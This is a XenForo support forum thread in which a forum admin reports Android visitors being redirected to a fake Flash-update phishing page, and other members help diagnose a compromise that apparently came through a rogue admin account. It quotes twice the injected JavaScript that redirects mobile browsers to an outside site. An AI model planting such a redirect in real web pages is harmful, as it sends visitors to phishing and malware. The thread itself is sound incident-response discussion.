Not a bug XenForo exploit on Android phone

nailxx

Member
Hello!

I use XenForo for 2 years or so we've never stumbled upon security issues. However a day ago or so something happened and users visiting our forum from Android-phones get redirected to a fishing site (http://flash-2012.com) that uses Adobe Flash logo and says that your flash version is obsolete and need to be upgraded. Once an user agrees he get redirected to porno, warez and other things like that.

The bug is not present at devices other than Android phones: even on Samsung Galaxy Tab Tablet.

The forum is deployed at http://forum.amperka.ru. Just upgraded it from 1.1.0 to 1.1.3, it didn't help.

How this could be done and what should I do to fix this?
 
Just upgraded it from 1.1.0 to 1.1.3, it didn't help.

This is bad...

Prevention is better than the cure, and in this case - as is the same with any software - it is so incredibly important to ensure that patches are applied as soon as is feasibly possible.

1.1.0 was released nearly a year ago... that's a long time to not install any updates.

Why have you left it so long, have you not renewed your support license?

I don't have an Android phone, so I can't test this myself.
 
I have sooo much small issues every day that I've just ignored that «new versions». My bad. But for now I'm here. And would be glad to receive some comments: could it be ever related to that SWF upload bug or not. If so, how it could be fixed?
 
It could be related to that. By upgrading to 1.1.3 then that particular problem is now fixed in that it won't be able to happen again. But the damage has now been done so there's going to be lots of work involved in finding out what's changed and putting it right.

I would start by searching your templates for references to the URL that they get redirected to. See if you can remove reference and fix it that way. Failing that do the following, probably in this order:

1) Reupload all files (not just the upgrade package) from version 1.1.3.
If the problem persists, then none of the core files have been changed.

2) Disable all add-ons. Definitely all of them, don't leave any running.
Try again - is the problem resolved? If so, then enable each add-on one by one and test again.

2) Rebuild the master data by going to http://yourforum.com/install
This doesn't delete or remove anything, but it will revert any changes made to the Master templates. And probably the master language - this may be relevant to you but hopefully your Russian translation has been installed as a separate language rather than a straight edit of the master language.

3) Create a new style with no parent (it will therefore be created from the Master templates).

4) Enable that new style and try again on an Android phone.
If the problem is resolved then it would suggest that there has been some sort of template modified which is redirecting users to that page. At this point, I'd probably be inclined to delete that style and start again from scratch.
 
Code:
<script type="text/javascript">
<!--
if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i)!==null){
  window.location = "http://jakjak.ru/in.cgi?7";
}
//-->
</script>

This is the code that is doing it, so it isn't an issue with XenForo, but with your forum having been compromised.

Follow what Chris said, and you should be able to track it down.
 
Oh, thank you for the hint. Playing with firebug for the hour I couldn't find this. Thanks!

Will try to remove this gracefully.
 
Code:
<script type="text/javascript">
<!--
if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i)!==null){
  window.location = "http://jakjak.ru/in.cgi?7";
}
//-->
</script>

This is the code that is doing it, so it isn't an issue with XenForo, but with your forum having been compromised.

Follow what Chris said, and you should be able to track it down.
Good find, that man. I looked through the code and missed it :)

Oh, thank you for the hint. Playing with firebug for the hour I couldn't find this. Thanks!

Will try to remove this gracefully.

There's one more thing:

You actually do need to trawl through your Admin Log to see if you can track down how this happened.

As well as there being an exploit as the possible cause, there's also every possibility that a "trusted" staff member might have done it. Or, at least, their account has been compromised.

It's often too easy to assume that problems have been caused by exploits or holes - in actuality the biggest security risk is ourselves and our passwords. You or one of your staff members may have unwittingly logged into a phishing page with your Admin account, or you might have a key logger on your machine... Don't assume that just because the problem has gone away, your forum is patched that the problem will go away for good. You really now need to identify the root cause for definite and ensure it doesn't happen again. If it was an exploit such as the swfupload one then great, you've fixed it. But if someone knows your password, or another admin's password or even if you have a rogue staff member on your team then this could easily happen again.
 
Thanks, men!

I've deleted parsitic snippet. For now the problem is gone.

Looking at admin log I found that the change was done by someone with administrator privilegies. I've never saw this user before and he's activity last for only 15 minutes. We're small company and there're only 2 forum admins. I trust them 100%. I've deleted fake admin.

Could that SWF bug allow creation of new admin account without ours' approval?
 
I very recently saw a similar thing happen to a different forum. They were running 1.1.2 and hadn't yet had time to upgrade to 1.1.3 or even use the single file fix that was provided.

I can only assume it was the swfupload vulnerability.
 
Thanks, men!

I've deleted parsitic snippet. For now the problem is gone.

Looking at admin log I found that the change was done by someone with administrator privilegies. I've never saw this user before and he's activity last for only 15 minutes. We're small company and there're only 2 forum admins. I trust them 100%. I've deleted fake admin.

Could that SWF bug allow creation of new admin account without ours' approval?

YES (but normally when there is something else supporting it)

I would also check your server logs to be sure nothing else is the root of the cause. Old server software or not properly set permission settings (on the server) are normally what causes issues.
 
Top Bottom